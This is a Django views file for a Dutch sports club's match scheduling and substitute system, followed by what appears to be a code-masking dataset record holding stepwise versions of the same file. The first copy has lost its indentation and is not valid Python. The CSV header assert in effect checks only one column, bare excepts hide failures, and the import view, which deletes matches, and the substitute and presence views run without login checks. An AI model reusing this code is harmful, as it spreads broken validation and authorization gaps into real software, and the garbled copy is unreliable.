from django.contrib.auth.models import User
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response, render
from django.contrib.auth.models import User
from django.template import RequestContext
from django.utils import simplejson
from django.core.mail import send_mail
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib import messages
from pytz import timezone
import pytz
from mailsnake import *
from .feeds import EventFeed
import mijnhercules.settings as settings
from .models import Match, Location
from .forms import MatchPresence
from members.models import Team, Player, MembershipHercules, Pass
# from mijnhercules.forms import *
from members.forms import EditPlayerForm, ArrangeSubstitutesForm, importMatchesForm, importPlayersForm
SITE_ROOT = os.path.dirname(os.path.realpath(manage.__file__))
eu = pytz.utc
#count amount of teams
# @login_required
# def TeamCount():
# t = Team.objects.all()
# return len(t)
def createMatchFeed(request, teamwedstrijd = None):
cal = EventFeed(teamwedstrijd)
return cal.__call__(request)
@login_required
def viewMatch(request, match):
try:
m = Match.objects.get(id=match)
except Match.DoesNotExist:
raise Http404
teams = m.getHercules()
substituteoptions = False
substitutes = {}
for t in teams:
if m.getSubstitutes(t.pk) != 0:
substituteoptions = True
substitutes[t] = m.getSubstitutes(t.pk)
# raise ValueError
return render(request, 'viewmatch.html', {'match':m, 'hercules':teams, 'substitutes':substitutes, 'substituteoptions':substituteoptions})
def editMatch(request, match):
u1 = User.objects.get(username=request.user.username)
teampk = u1.get_profile().team_member.pk
try:
m = Match.objects.get(id=match)
except Match.DoesNotExist:
raise Http404
if request.method == 'POST' and m.isTeam(teampk):
form = ArrangeSubstitutesForm(request.POST)
if form.is_valid():
cd = form.cleaned_data
# m.substitutesneeded = cd['substitutesneeded']
m.setSubstitutes(team = teampk, amountsubsneeded = cd['substitutesneeded'])
m.save()
return render(request, 'player/editplayer_complete.html')
else:
if m.isTeam(teampk):
form = ArrangeSubstitutesForm(initial={'substitutesneeded': m.getSubstitutesNeeded(teampk)})
u1 = User.objects.get(username=request.user.username)
player = u1.get_profile()
if player.gender == 'V':
substituteWilling = Player.women.filter(substitutewilling=True)
elif player.gender == 'M':
substituteWilling = Player.men.filter(substitutewilling=True)
presentplayers = m.getPresentPlayers(player.team_member.pk)
return render(request, 'match.html', {'match':m, 'form': form, 'substitutes':substituteWilling, 'presentplayers':presentplayers})
else:
raise Http404
def readMatch(f):
# with open(f, 'rU') as csvfile:
# data = csv.reader(csvfile, delimiter=';', dialect=csv.excel_tab)
# data.next()
# data = f.read()
# data = data.splitlines()
# dialect = csv.Sniffer().sniff(codecs.EncodedFile(f,"utf-8").read(1024))
f.open()
# check whether headers are indicative of a good csv file:
reader = csv.reader(codecs.EncodedFile(f,"latin-1"), delimiter=';', dialect=csv.excel_tab)
try:
assert 'Wedstrijdnummer' and 'Wedstrijddatum (niet geformatteerd)' and 'Aanvangstijd' and 'Aanduiding' and \
'Thuis team' and 'Uit team' and 'Sport omschrijving' and 'Veld' and 'Accommodatie naam' and 'Plaats' in reader.next()
except:
# mail_admins("Foute wedstrijd upload", "Probleem met CSV upload", fail_silently=False)
return [], "Foutje: het lijkt geen csv bestand te zijn."
f.close()
# get min and max daterange so cancelled matches can be deleted later on:
f.open()
data = csv.DictReader(codecs.EncodedFile(f,"latin-1"), delimiter=';', dialect=csv.excel_tab)
dates = []
for row in data:
try:
date = eu.localize(datetime.strptime((row['Wedstrijddatum (niet geformatteerd)']+" " + row['Aanvangstijd']), '%d-%m-%y %H:%M'))
except:
date = eu.localize(datetime.strptime((row['Wedstrijddatum (niet geformatteerd)']+" " + row['Aanvangstijd']), '%d-%m-%Y %H:%M'))
dates.append(date)
mindate = min(dates)
maxdate = max(dates)
existingmatches = Match.objects.filter(date__lte=maxdate).filter(date__gte=mindate)
f.close()
# start saving matches
savedmatches = []
f.open()
data = csv.DictReader(codecs.EncodedFile(f,"latin-1"), delimiter=';', dialect=csv.excel_tab)
for row in data:
if "Zaal" in row['Aanduiding']:
# add locations if not yet existent in the db
try:
loca = re.match(r'(.*)\sveld', row['Veld'])
hall = loca.group(1)
loc = Location.objects.get(name=hall)
#print "Existing", loc
except:
loc = re.match(r'(.*)\sveld', row['Veld'])
loc = Location.objects.create(name=loc.group(1))
loc.save()
#add team if not yet existent in the db
try:
t1 = Team.objects.get(number=row['Thuis team'])
except:
t1 = Team.objects.create(number = row['Thuis team'], level = '99')
t1.save()
try:
t2 = Team.objects.get(number=row['Uit team'])
except:
t2 = Team.objects.create(number = row['Uit team'], level = '99')
t2.save()
# get datetime field:
try:
date = eu.localize(datetime.strptime((row['Wedstrijddatum (niet geformatteerd)']+" " + row['Aanvangstijd']), '%d-%m-%y %H:%M'))
except:
date = eu.localize(datetime.strptime((row['Wedstrijddatum (niet geformatteerd)']+" " + row['Aanvangstijd']), '%d-%m-%Y %H:%M'))
#get matches:
try:
m = Match.objects.get(nrid=row['Wedstrijdnummer'])
m.date = date
m.teamhome = t1
m.teamaway = t2
m.location = loc
m.save()
savedmatches.append(m)
#print m
# saveMatch(m, row[1] + row[2], t1, t2, loc)
except:
#print "except match with %s and %s" % (t1, t2)
m = Match(
nrid=row['Wedstrijdnummer'],
date = date,
teamhome = t1,
teamaway = t2,
location = loc)
m.save()
savedmatches.append(m)
# delete cancelled matches:
for e in existingmatches:
if e not in savedmatches:
e.delete()
f.close()
return savedmatches, None
def importMatch(request):
matches = Match.objects.exclude(date__lte=date.today()).order_by('date')
if request.method == 'POST':
form = importMatchesForm(request.POST, request.FILES)
if form.is_valid():
savedmatches, fail = readMatch(request.FILES['matches'])
# request.FILES['matches'].open("rb")
# portfolio = csv.DictReader(request.FILES['uploadFile'].file)
return render(request, 'savematch_success.html', {'savedmatches':savedmatches, 'fail': fail})
else:
form = importMatchesForm()
return render(request, 'savematch.html', {'form': form, 'matches': matches})
def viewMyMatches(request):
u1 = User.objects.get(username=request.user.username)
teampk = u1.get_profile().team_member.pk
matches = Match.objects.get_my_matches(teampk)
presentmatches = {}
for m in matches:
if m.playerPresent(teampk, u1):
status = 'Aanwezig'
else:
status = 'Afwezig'
presentmatches[m] = MatchPresence(initial = status)
# raise ValueError
return render(request, 'mymatches.html', {'mymatches': matches, 'presentmatches':presentmatches})
def offerSubstitute(request, matchpk, teampk, substitutepk):
match = Match.objects.get(pk=matchpk)
match.addSubstitute(teampk = teampk, player = Player.objects.get(pk=substitutepk))
messages.add_message(request, messages.SUCCESS, 'Je hebt jezelf aangemeld als mogelijke invaller. Goed bezig!!')
# return render(request, 'substitutewilling_confirmation.html')
# redirect_url = reverse(viewMatch, args=matchpk,)
return redirect(reverse(viewMatch, args=(matchpk,)))
def cancelSubstituteOffer(request, matchpk, teampk, substitutepk):
match = Match.objects.get(pk=matchpk)
match.removeSubstitute(teampk=teampk, player =Player.objects.get(pk=substitutepk))
# return render(request, 'substitutewilling_cancellation.html')
messages.add_message(request, messages.SUCCESS, 'Je afmelding als mogelijke invaller is doorgegeven.')
# return render(request, 'substitutewilling_confirmation.html')
# redirect_url = reverse(viewMatch, args=matchpk,)
return redirect(reverse(viewMatch, args=(matchpk,)))
def addMatchPresence(request, matchpk, teampk, playerpk):
match = Match.objects.get(pk=matchpk)
match.addMatchPresence(teampk = teampk, player = Player.objects.get(pk=playerpk))
messages.add_message(request, messages.SUCCESS, 'Je hebt jezelf aangemeld voor deze wedstrijd!!')
# return render(request, 'substitutewilling_confirmation.html')
# redirect_url = reverse(viewMatch, args=matchpk,)
return redirect(reverse(editMatch, args=(matchpk,)))
def removeMatchPresence(request, matchpk, teampk, playerpk):
match = Match.objects.get(pk=matchpk)
match.removeMatchPresence(teampk=teampk, player =Player.objects.get(pk=playerpk))
# return render(request, 'substitutewilling_cancellation.html')
messages.add_message(request, messages.SUCCESS, 'Je afmelding voor deze wedstrijd is doorgegeven.')
# return render(request, 'substitutewilling_confirmation.html')
# redirect_url = reverse(viewMatch, args=matchpk,)
return redirect(reverse(editMatch, args=(matchpk,)))
|
normal
|
{
"blob_id": "480787d7bc0e87df7c59c4deb402eea76643680c",
"index": 7529,
"step-1": "<mask token>\n\n\ndef createMatchFeed(request, teamwedstrijd=None):\n cal = EventFeed(teamwedstrijd)\n return cal.__call__(request)\n\n\n@login_required\ndef viewMatch(request, match):\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n teams = m.getHercules()\n substituteoptions = False\n substitutes = {}\n for t in teams:\n if m.getSubstitutes(t.pk) != 0:\n substituteoptions = True\n substitutes[t] = m.getSubstitutes(t.pk)\n return render(request, 'viewmatch.html', {'match': m, 'hercules': teams,\n 'substitutes': substitutes, 'substituteoptions': substituteoptions})\n\n\n<mask token>\n\n\ndef viewMyMatches(request):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n matches = Match.objects.get_my_matches(teampk)\n presentmatches = {}\n for m in matches:\n if m.playerPresent(teampk, u1):\n status = 'Aanwezig'\n else:\n status = 'Afwezig'\n presentmatches[m] = MatchPresence(initial=status)\n return render(request, 'mymatches.html', {'mymatches': matches,\n 'presentmatches': presentmatches})\n\n\n<mask token>\n\n\ndef cancelSubstituteOffer(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.removeSubstitute(teampk=teampk, player=Player.objects.get(pk=\n substitutepk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding als mogelijke invaller is doorgegeven.')\n return redirect(reverse(viewMatch, args=(matchpk,)))\n\n\ndef addMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.addMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je hebt jezelf aangemeld voor deze wedstrijd!!')\n return redirect(reverse(editMatch, args=(matchpk,)))\n\n\ndef removeMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.removeMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding voor deze wedstrijd is doorgegeven.')\n return redirect(reverse(editMatch, args=(matchpk,)))\n",
"step-2": "<mask token>\n\n\ndef createMatchFeed(request, teamwedstrijd=None):\n cal = EventFeed(teamwedstrijd)\n return cal.__call__(request)\n\n\n@login_required\ndef viewMatch(request, match):\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n teams = m.getHercules()\n substituteoptions = False\n substitutes = {}\n for t in teams:\n if m.getSubstitutes(t.pk) != 0:\n substituteoptions = True\n substitutes[t] = m.getSubstitutes(t.pk)\n return render(request, 'viewmatch.html', {'match': m, 'hercules': teams,\n 'substitutes': substitutes, 'substituteoptions': substituteoptions})\n\n\ndef editMatch(request, match):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n if request.method == 'POST' and m.isTeam(teampk):\n form = ArrangeSubstitutesForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n m.setSubstitutes(team=teampk, amountsubsneeded=cd[\n 'substitutesneeded'])\n m.save()\n return render(request, 'player/editplayer_complete.html')\n elif m.isTeam(teampk):\n form = ArrangeSubstitutesForm(initial={'substitutesneeded': m.\n getSubstitutesNeeded(teampk)})\n u1 = User.objects.get(username=request.user.username)\n player = u1.get_profile()\n if player.gender == 'V':\n substituteWilling = Player.women.filter(substitutewilling=True)\n elif player.gender == 'M':\n substituteWilling = Player.men.filter(substitutewilling=True)\n presentplayers = m.getPresentPlayers(player.team_member.pk)\n return render(request, 'match.html', {'match': m, 'form': form,\n 'substitutes': substituteWilling, 'presentplayers': presentplayers}\n )\n else:\n raise Http404\n\n\ndef readMatch(f):\n f.open()\n reader = csv.reader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n try:\n assert 'Wedstrijdnummer' and 'Wedstrijddatum (niet geformatteerd)' and 'Aanvangstijd' and 'Aanduiding' and 'Thuis team' and 'Uit team' and 'Sport omschrijving' and 'Veld' and 'Accommodatie naam' and 'Plaats' in reader.next(\n )\n except:\n return [], 'Foutje: het lijkt geen csv bestand te zijn.'\n f.close()\n f.open()\n data = csv.DictReader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n dates = []\n for row in data:\n try:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%Y %H:%M'))\n dates.append(date)\n mindate = min(dates)\n maxdate = max(dates)\n existingmatches = Match.objects.filter(date__lte=maxdate).filter(date__gte\n =mindate)\n f.close()\n savedmatches = []\n f.open()\n data = csv.DictReader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n for row in data:\n if 'Zaal' in row['Aanduiding']:\n try:\n loca = re.match('(.*)\\\\sveld', row['Veld'])\n hall = loca.group(1)\n loc = Location.objects.get(name=hall)\n except:\n loc = re.match('(.*)\\\\sveld', row['Veld'])\n loc = Location.objects.create(name=loc.group(1))\n loc.save()\n try:\n t1 = Team.objects.get(number=row['Thuis team'])\n except:\n t1 = Team.objects.create(number=row['Thuis team'], level='99')\n t1.save()\n try:\n t2 = Team.objects.get(number=row['Uit team'])\n except:\n t2 = Team.objects.create(number=row['Uit team'], level='99')\n t2.save()\n try:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%Y %H:%M'))\n try:\n m = Match.objects.get(nrid=row['Wedstrijdnummer'])\n m.date = date\n m.teamhome = t1\n m.teamaway = t2\n m.location = loc\n m.save()\n savedmatches.append(m)\n except:\n m = Match(nrid=row['Wedstrijdnummer'], date=date, teamhome=\n t1, teamaway=t2, location=loc)\n m.save()\n savedmatches.append(m)\n for e in existingmatches:\n if e not in savedmatches:\n e.delete()\n f.close()\n return savedmatches, None\n\n\n<mask token>\n\n\ndef viewMyMatches(request):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n matches = Match.objects.get_my_matches(teampk)\n presentmatches = {}\n for m in matches:\n if m.playerPresent(teampk, u1):\n status = 'Aanwezig'\n else:\n status = 'Afwezig'\n presentmatches[m] = MatchPresence(initial=status)\n return render(request, 'mymatches.html', {'mymatches': matches,\n 'presentmatches': presentmatches})\n\n\n<mask token>\n\n\ndef cancelSubstituteOffer(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.removeSubstitute(teampk=teampk, player=Player.objects.get(pk=\n substitutepk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding als mogelijke invaller is doorgegeven.')\n return redirect(reverse(viewMatch, args=(matchpk,)))\n\n\ndef addMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.addMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je hebt jezelf aangemeld voor deze wedstrijd!!')\n return redirect(reverse(editMatch, args=(matchpk,)))\n\n\ndef removeMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.removeMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding voor deze wedstrijd is doorgegeven.')\n return redirect(reverse(editMatch, args=(matchpk,)))\n",
"step-3": "<mask token>\n\n\ndef createMatchFeed(request, teamwedstrijd=None):\n cal = EventFeed(teamwedstrijd)\n return cal.__call__(request)\n\n\n@login_required\ndef viewMatch(request, match):\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n teams = m.getHercules()\n substituteoptions = False\n substitutes = {}\n for t in teams:\n if m.getSubstitutes(t.pk) != 0:\n substituteoptions = True\n substitutes[t] = m.getSubstitutes(t.pk)\n return render(request, 'viewmatch.html', {'match': m, 'hercules': teams,\n 'substitutes': substitutes, 'substituteoptions': substituteoptions})\n\n\ndef editMatch(request, match):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n if request.method == 'POST' and m.isTeam(teampk):\n form = ArrangeSubstitutesForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n m.setSubstitutes(team=teampk, amountsubsneeded=cd[\n 'substitutesneeded'])\n m.save()\n return render(request, 'player/editplayer_complete.html')\n elif m.isTeam(teampk):\n form = ArrangeSubstitutesForm(initial={'substitutesneeded': m.\n getSubstitutesNeeded(teampk)})\n u1 = User.objects.get(username=request.user.username)\n player = u1.get_profile()\n if player.gender == 'V':\n substituteWilling = Player.women.filter(substitutewilling=True)\n elif player.gender == 'M':\n substituteWilling = Player.men.filter(substitutewilling=True)\n presentplayers = m.getPresentPlayers(player.team_member.pk)\n return render(request, 'match.html', {'match': m, 'form': form,\n 'substitutes': substituteWilling, 'presentplayers': presentplayers}\n )\n else:\n raise Http404\n\n\ndef readMatch(f):\n f.open()\n reader = csv.reader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n try:\n assert 'Wedstrijdnummer' and 'Wedstrijddatum (niet geformatteerd)' and 'Aanvangstijd' and 'Aanduiding' and 'Thuis team' and 'Uit team' and 'Sport omschrijving' and 'Veld' and 'Accommodatie naam' and 'Plaats' in reader.next(\n )\n except:\n return [], 'Foutje: het lijkt geen csv bestand te zijn.'\n f.close()\n f.open()\n data = csv.DictReader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n dates = []\n for row in data:\n try:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%Y %H:%M'))\n dates.append(date)\n mindate = min(dates)\n maxdate = max(dates)\n existingmatches = Match.objects.filter(date__lte=maxdate).filter(date__gte\n =mindate)\n f.close()\n savedmatches = []\n f.open()\n data = csv.DictReader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n for row in data:\n if 'Zaal' in row['Aanduiding']:\n try:\n loca = re.match('(.*)\\\\sveld', row['Veld'])\n hall = loca.group(1)\n loc = Location.objects.get(name=hall)\n except:\n loc = re.match('(.*)\\\\sveld', row['Veld'])\n loc = Location.objects.create(name=loc.group(1))\n loc.save()\n try:\n t1 = Team.objects.get(number=row['Thuis team'])\n except:\n t1 = Team.objects.create(number=row['Thuis team'], level='99')\n t1.save()\n try:\n t2 = Team.objects.get(number=row['Uit team'])\n except:\n t2 = Team.objects.create(number=row['Uit team'], level='99')\n t2.save()\n try:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%Y %H:%M'))\n try:\n m = Match.objects.get(nrid=row['Wedstrijdnummer'])\n m.date = date\n m.teamhome = t1\n m.teamaway = t2\n m.location = loc\n m.save()\n savedmatches.append(m)\n except:\n m = Match(nrid=row['Wedstrijdnummer'], date=date, teamhome=\n t1, teamaway=t2, location=loc)\n m.save()\n savedmatches.append(m)\n for e in existingmatches:\n if e not in savedmatches:\n e.delete()\n f.close()\n return savedmatches, None\n\n\n<mask token>\n\n\ndef viewMyMatches(request):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n matches = Match.objects.get_my_matches(teampk)\n presentmatches = {}\n for m in matches:\n if m.playerPresent(teampk, u1):\n status = 'Aanwezig'\n else:\n status = 'Afwezig'\n presentmatches[m] = MatchPresence(initial=status)\n return render(request, 'mymatches.html', {'mymatches': matches,\n 'presentmatches': presentmatches})\n\n\ndef offerSubstitute(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.addSubstitute(teampk=teampk, player=Player.objects.get(pk=\n substitutepk))\n messages.add_message(request, messages.SUCCESS,\n 'Je hebt jezelf aangemeld als mogelijke invaller. Goed bezig!!')\n return redirect(reverse(viewMatch, args=(matchpk,)))\n\n\ndef cancelSubstituteOffer(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.removeSubstitute(teampk=teampk, player=Player.objects.get(pk=\n substitutepk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding als mogelijke invaller is doorgegeven.')\n return redirect(reverse(viewMatch, args=(matchpk,)))\n\n\ndef addMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.addMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je hebt jezelf aangemeld voor deze wedstrijd!!')\n return redirect(reverse(editMatch, args=(matchpk,)))\n\n\ndef removeMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.removeMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding voor deze wedstrijd is doorgegeven.')\n return redirect(reverse(editMatch, args=(matchpk,)))\n",
"step-4": "<mask token>\nSITE_ROOT = os.path.dirname(os.path.realpath(manage.__file__))\neu = pytz.utc\n\n\ndef createMatchFeed(request, teamwedstrijd=None):\n cal = EventFeed(teamwedstrijd)\n return cal.__call__(request)\n\n\n@login_required\ndef viewMatch(request, match):\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n teams = m.getHercules()\n substituteoptions = False\n substitutes = {}\n for t in teams:\n if m.getSubstitutes(t.pk) != 0:\n substituteoptions = True\n substitutes[t] = m.getSubstitutes(t.pk)\n return render(request, 'viewmatch.html', {'match': m, 'hercules': teams,\n 'substitutes': substitutes, 'substituteoptions': substituteoptions})\n\n\ndef editMatch(request, match):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n if request.method == 'POST' and m.isTeam(teampk):\n form = ArrangeSubstitutesForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n m.setSubstitutes(team=teampk, amountsubsneeded=cd[\n 'substitutesneeded'])\n m.save()\n return render(request, 'player/editplayer_complete.html')\n elif m.isTeam(teampk):\n form = ArrangeSubstitutesForm(initial={'substitutesneeded': m.\n getSubstitutesNeeded(teampk)})\n u1 = User.objects.get(username=request.user.username)\n player = u1.get_profile()\n if player.gender == 'V':\n substituteWilling = Player.women.filter(substitutewilling=True)\n elif player.gender == 'M':\n substituteWilling = Player.men.filter(substitutewilling=True)\n presentplayers = m.getPresentPlayers(player.team_member.pk)\n return render(request, 'match.html', {'match': m, 'form': form,\n 'substitutes': substituteWilling, 'presentplayers': presentplayers}\n )\n else:\n raise Http404\n\n\ndef readMatch(f):\n f.open()\n reader = csv.reader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n try:\n assert 'Wedstrijdnummer' and 'Wedstrijddatum (niet geformatteerd)' and 'Aanvangstijd' and 'Aanduiding' and 'Thuis team' and 'Uit team' and 'Sport omschrijving' and 'Veld' and 'Accommodatie naam' and 'Plaats' in reader.next(\n )\n except:\n return [], 'Foutje: het lijkt geen csv bestand te zijn.'\n f.close()\n f.open()\n data = csv.DictReader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n dates = []\n for row in data:\n try:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%Y %H:%M'))\n dates.append(date)\n mindate = min(dates)\n maxdate = max(dates)\n existingmatches = Match.objects.filter(date__lte=maxdate).filter(date__gte\n =mindate)\n f.close()\n savedmatches = []\n f.open()\n data = csv.DictReader(codecs.EncodedFile(f, 'latin-1'), delimiter=';',\n dialect=csv.excel_tab)\n for row in data:\n if 'Zaal' in row['Aanduiding']:\n try:\n loca = re.match('(.*)\\\\sveld', row['Veld'])\n hall = loca.group(1)\n loc = Location.objects.get(name=hall)\n except:\n loc = re.match('(.*)\\\\sveld', row['Veld'])\n loc = Location.objects.create(name=loc.group(1))\n loc.save()\n try:\n t1 = Team.objects.get(number=row['Thuis team'])\n except:\n t1 = Team.objects.create(number=row['Thuis team'], level='99')\n t1.save()\n try:\n t2 = Team.objects.get(number=row['Uit team'])\n except:\n t2 = Team.objects.create(number=row['Uit team'], level='99')\n t2.save()\n try:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime(row[\n 'Wedstrijddatum (niet geformatteerd)'] + ' ' + row[\n 'Aanvangstijd'], '%d-%m-%Y %H:%M'))\n try:\n m = Match.objects.get(nrid=row['Wedstrijdnummer'])\n m.date = date\n m.teamhome = t1\n m.teamaway = t2\n m.location = loc\n m.save()\n savedmatches.append(m)\n except:\n m = Match(nrid=row['Wedstrijdnummer'], date=date, teamhome=\n t1, teamaway=t2, location=loc)\n m.save()\n savedmatches.append(m)\n for e in existingmatches:\n if e not in savedmatches:\n e.delete()\n f.close()\n return savedmatches, None\n\n\ndef importMatch(request):\n matches = Match.objects.exclude(date__lte=date.today()).order_by('date')\n if request.method == 'POST':\n form = importMatchesForm(request.POST, request.FILES)\n if form.is_valid():\n savedmatches, fail = readMatch(request.FILES['matches'])\n return render(request, 'savematch_success.html', {\n 'savedmatches': savedmatches, 'fail': fail})\n else:\n form = importMatchesForm()\n return render(request, 'savematch.html', {'form': form, 'matches': matches}\n )\n\n\ndef viewMyMatches(request):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n matches = Match.objects.get_my_matches(teampk)\n presentmatches = {}\n for m in matches:\n if m.playerPresent(teampk, u1):\n status = 'Aanwezig'\n else:\n status = 'Afwezig'\n presentmatches[m] = MatchPresence(initial=status)\n return render(request, 'mymatches.html', {'mymatches': matches,\n 'presentmatches': presentmatches})\n\n\ndef offerSubstitute(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.addSubstitute(teampk=teampk, player=Player.objects.get(pk=\n substitutepk))\n messages.add_message(request, messages.SUCCESS,\n 'Je hebt jezelf aangemeld als mogelijke invaller. Goed bezig!!')\n return redirect(reverse(viewMatch, args=(matchpk,)))\n\n\ndef cancelSubstituteOffer(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.removeSubstitute(teampk=teampk, player=Player.objects.get(pk=\n substitutepk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding als mogelijke invaller is doorgegeven.')\n return redirect(reverse(viewMatch, args=(matchpk,)))\n\n\ndef addMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.addMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je hebt jezelf aangemeld voor deze wedstrijd!!')\n return redirect(reverse(editMatch, args=(matchpk,)))\n\n\ndef removeMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.removeMatchPresence(teampk=teampk, player=Player.objects.get(pk=\n playerpk))\n messages.add_message(request, messages.SUCCESS,\n 'Je afmelding voor deze wedstrijd is doorgegeven.')\n return redirect(reverse(editMatch, args=(matchpk,)))\n",
"step-5": "from unidecode import unidecode\nimport pdb\nimport os, manage\nimport re\nfrom datetime import *\nimport codecs\nimport csv\nimport smtplib\n\nfrom django.core.urlresolvers import reverse \nfrom django.shortcuts import redirect\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\nfrom django.contrib import messages\nfrom django.http import Http404\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render_to_response, render\nfrom django.contrib.auth.models import User\nfrom django.template import RequestContext\nfrom django.utils import simplejson\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib import messages\n\nfrom pytz import timezone\nimport pytz\nfrom mailsnake import *\n\nfrom .feeds import EventFeed\nimport mijnhercules.settings as settings\nfrom .models import Match, Location\nfrom .forms import MatchPresence\nfrom members.models import Team, Player, MembershipHercules, Pass\n# from mijnhercules.forms import *\nfrom members.forms import EditPlayerForm, ArrangeSubstitutesForm, importMatchesForm, importPlayersForm\n\nSITE_ROOT = os.path.dirname(os.path.realpath(manage.__file__))\n\neu = pytz.utc\n\n#count amount of teams\n# @login_required\n# def TeamCount():\n# t = Team.objects.all()\n# return len(t)\n\ndef createMatchFeed(request, teamwedstrijd = None):\n cal = EventFeed(teamwedstrijd)\n return cal.__call__(request) \n\n@login_required\ndef viewMatch(request, match):\n try:\n m = Match.objects.get(id=match)\n except 